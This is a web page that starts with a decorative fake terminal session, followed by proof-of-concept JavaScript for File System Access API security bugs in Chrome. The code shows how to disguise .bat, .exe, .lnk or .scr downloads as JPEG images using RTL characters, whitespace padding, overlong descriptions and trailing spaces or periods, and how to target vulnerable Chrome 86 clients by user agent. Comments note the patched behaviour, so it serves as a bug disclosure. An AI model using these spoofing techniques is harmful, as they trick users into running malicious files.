[email protected]:/home$
sudo -s
[sudo] password for intadd:

[email protected]:/home#
python3
Python 3.6.9 (default, Apr 18 2020, 01:56:04)
[GCC 8.4.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import requests
>>> res=requests.get("http://InPeaceForLife.how",headers="{'name':'intadd','birth':'971219'}")
>>> res
<Response [200]>
>>> res.text
'We have to love each other.'
>>> f = open("/var/log/intadd/20200706_notepad.log",'a')
>>> f.write(res.text)
27
>>> f.close()
>>> exit();
[email protected]:/home#
ls
Contact   Blog    WhoAmI
[email protected]:/home#
exit;
exit
[email protected]:/home$
id
uid=1000(intadd) gid=1001(KIA) groups=1001(KIA)
[email protected]:/home$
 
File System Access API - security bugs

File System Access API - security bugs

await handle.createWritable() // 1) download file from local/server (Good for exe/lnk) //you need to have FUD file lnkextra.lnk on server/local //can be changed to diffrent file like cat.jpg // const response = await fetch('lnkextra.lnk'); // await response.body.pipeTo(writable); // 2) write text to download file (Good for bat) //instead of downloading file we can write text to file await writable.write('C:\\Windows\\system32\\calc.exe') await writable.close() }) //Other examples you need to swap "types" section :) // A many of whitespace and fake extensions in the description // before patch: Save as type: "JPEG Image (*.jpg)" descritpion too long real extension was hidden // after patch: Save as type: "JPEG Image (.jpg) limits on description length // // types: [ // { // description: // "JPEG Image (*.jpeg) \n\n\t\t\t\t\t\t\n\n\n ", // accept: { // "text/plain": [".bat"] // } // } // ] // RTL in description // before patch: Manipulation with RTL character // after patch: RTL character is still working but we can't manipulate to delete extension // // types: [ // { // description: "Foo \u202egepj\u202e.moc.segami.www.exe Ardd", // accept: { // "text/plain": [".bat"] // } // } // ] // Super long description // before patch: Description is too long so real extensions are hidden // after patch: limits on description length // // types: [ // { // description: "JPEG Image (*.jpeg) this is super safe image, because it is a cat, and cats are cool there is nothing to worry about this must do exactly what you think it does, so you can download it and be happy", // accept: { // "text/plain": [".bat"] // } // } // ] // Many spaces in the extension // before patch: Extra manipulation of file name by extension field // after patch: extension filed has limited lenght // // types: [ // { // description: "JPEG Image", // accept: { // "text/plain": [ // ".jpg .bat" // ] // } // } // ] // RTL in extension // before patch: Manipulation with RTL character // after patch: RTL character is blocked // // types: [ // { // description: "JPEG Image (*.jpeg)", // accept: { // "text/plain": [".\u202egepj\u202e.moc.segami.www.exe"] // } // } // ] // Extension ends with space (source: https://docs.microsoft.com/en-us/windows/win32/fileio/naming-a-file) // before patch: File is downloaded and hard to deleted on windows (Possible that it wasnt always working) // after patch: Extension cannot have space at the end // // types: [ // { // description: "JPEG Image", // accept: { // "text/plain": [".jpeg "] // } // } // ] // Extension ends with period (source: https://docs.microsoft.com/en-us/windows/win32/fileio/naming-a-file) // before patch: File is downloaded and hard to deleted on windows (Possible that it wasnt always working) - not sure // after patch: Extension cannot have space at the end // types: [ // { // description: "JPEG Image", // accept: { // "text/plain": [".jpeg."] // } // } // ] // lnk file // before patch: possible to download LNK - windows shortcut file // after patch: LNK files are blocked // types: [ // { // description: "JPEG Image (*.jpg)", // accept: { // "application/x-ms-shortcut": [] // } // } // ] // EXTRA - Because everything happens in JS we can check if user's browser is vulnerable //var userAgentA = navigator.userAgent; //var description = 'JPEG (*.jpeg)' //var extension = '.jpeg' //var file = "someRealPhotoFile.jpeg" //Exploit works on this client - windows 10 - change to dangerous .exe file // if (userAgentA.includes("Windows NT 10.0") && userAgentA.includes("Chrome/86.0.4240.75")) { // var extension = '.exe' // var file = "putty.exe" // } //Exploit works on this client - windows 7 - change to dangerous .src (screen saver) files (windows 10 stopped running .src files due to security issue) // But .src looking more legin than .exe - so it is better // else if (userAgentA.includes("Windows NT 6.1") && userAgentA.includes("Chrome/86.0.4240.75")) { // var extension = '.src' // var file = "putty.exe" // } //